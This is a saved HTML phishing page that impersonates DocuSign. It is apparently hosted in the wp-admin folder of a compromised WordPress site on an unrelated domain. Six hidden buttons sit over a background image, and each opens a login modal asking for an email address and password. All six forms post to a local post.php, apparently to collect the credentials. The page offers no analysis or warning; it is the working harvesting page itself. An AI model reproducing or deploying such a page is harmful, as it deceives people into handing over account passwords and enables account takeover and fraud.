
<!-- saved from url=(0062)https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>DocuSign</title>
	<link rel="icon" type="image/ico" href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/img/mstile-310x310.png">
	<style>
<style>
*{margin:0px; padding:0px; font-family:Helvetica, Arial, sans-serif;}

body {
    background-repeat:no-repeat;
}
/* Full-width input fields */
input[type=email], input[type=text] , input[type=password] {
    width: 90%;
    padding: 5px 5px;
    margin: 4px 26px;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
	font-size:16px;
}

/* Set a style for all buttons */
button {
	background-color: transparent;
	padding: 14px 20px;
	margin: 8px 26px;
	border: none;
	cursor: pointer;
	width: 90%;
	height: 40px;
	position: absolute;
	left: 444px;
	top: 35px;
}
button:hover {
    opacity: 0.8;
}

/* Center the image and position the close button */
.imgcontainer {
    text-align: center;
    margin: 24px 0 12px 0;
    position: relative;
}
.avatar {
    
}

/* The Modal (background) */
.modal {
	display:none;
    position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.4);
}

/* Modal Content Box */
.modal-content {
    background-color: #fff;
    margin: 4% auto 15% auto;
    border: 1px solid #888;
    width: 30%; 
	padding-bottom: 30px;
}

/* The Close Button (x) */
.close {
    position: absolute;
    right: 25px;
    top: 0;
    color: #000;
    font-size: 35px;
    font-weight: bold;
}
.close:hover,.close:focus {
    color: red;
    cursor: pointer;
}

/* Add Zoom Animation */
.animate {
    animation: zoom 0.6s
}
@keyframes zoom {
    from {transform: scale(0)} 
    to {transform: scale(1)}
}
    </style>


</head><body background="./DocuSign_files/main3.jpg">



<button onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:143px; margin-left:120px;"></button>

<div id="modal-wrapper" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
	  <img src="./DocuSign_files/av011.png" alt="Avatar" class="avatar" style="float:left; margin-left:26px; margin-top:26px; margin-bottom:26px;">
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" id="checkbox" name="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>


<button onclick="document.getElementById(&#39;modal-wrapper2&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:208px; margin-left:120px;"></button>

<div id="modal-wrapper2" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper2&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
      <img src="./DocuSign_files/av021.png" alt="Avatar" class="avatar" style="float:left; margin-left:26px; "><br><br>
	  <img src="./DocuSign_files/av022.png" alt="Avatar2" class="avatar2" style="float:left; margin-left:26px; margin-top:10px; margin-bottom:26px;">
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" id="checkbox" name="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>


<button onclick="document.getElementById(&#39;modal-wrapper3&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:268px; margin-left:120px;"></button>

<div id="modal-wrapper3" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper3&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
      <img src="./DocuSign_files/av031.png" alt="Avatar" class="avatar"><br><br>
	  
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" id="checkbox" name="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>

<button onclick="document.getElementById(&#39;modal-wrapper4&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:323px; margin-left:120px;"></button>

<div id="modal-wrapper4" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper4&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
      <img src="./DocuSign_files/av041.png" alt="Avatar" class="avatar"><br><br>
	  
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" id="checkbox" name="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>
    
<button onclick="document.getElementById(&#39;modal-wrapper5&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:383px; margin-left:120px;"></button>

<div id="modal-wrapper5" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper5&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
      <img src="./DocuSign_files/av051.png" alt="Avatar" class="avatar" style="float:left; margin-left:26px; margin-top:15px; margin-bottom:15px;">
	  
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" id="checkbox" name="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>


<button onclick="document.getElementById(&#39;modal-wrapper6&#39;).style.display=&#39;block&#39;" style="width:200px; margin-top:443px; margin-left:120px;"></button>

<div id="modal-wrapper6" class="modal">
  
  <form class="modal-content animate" method="post" action="post.php">
        
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper6&#39;).style.display=&#39;none&#39;" class="close" title="Close">×</span>
      <img src="./DocuSign_files/av061.png" alt="Avatar" class="avatar" style="margin-top:15px; margin-bottom:15px;">
	  
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Password" id="password" name="password" required="" style="height:32px; font-size:0.9em;">        
	  <input type="image" src="./DocuSign_files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
	  <a href="https://www.zgarafatosi.al/wp-admin/network/freedoms/docusign/#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">Can't access your account?</font></a>
    </div>
    
  </form>
  
</div>






</body></html>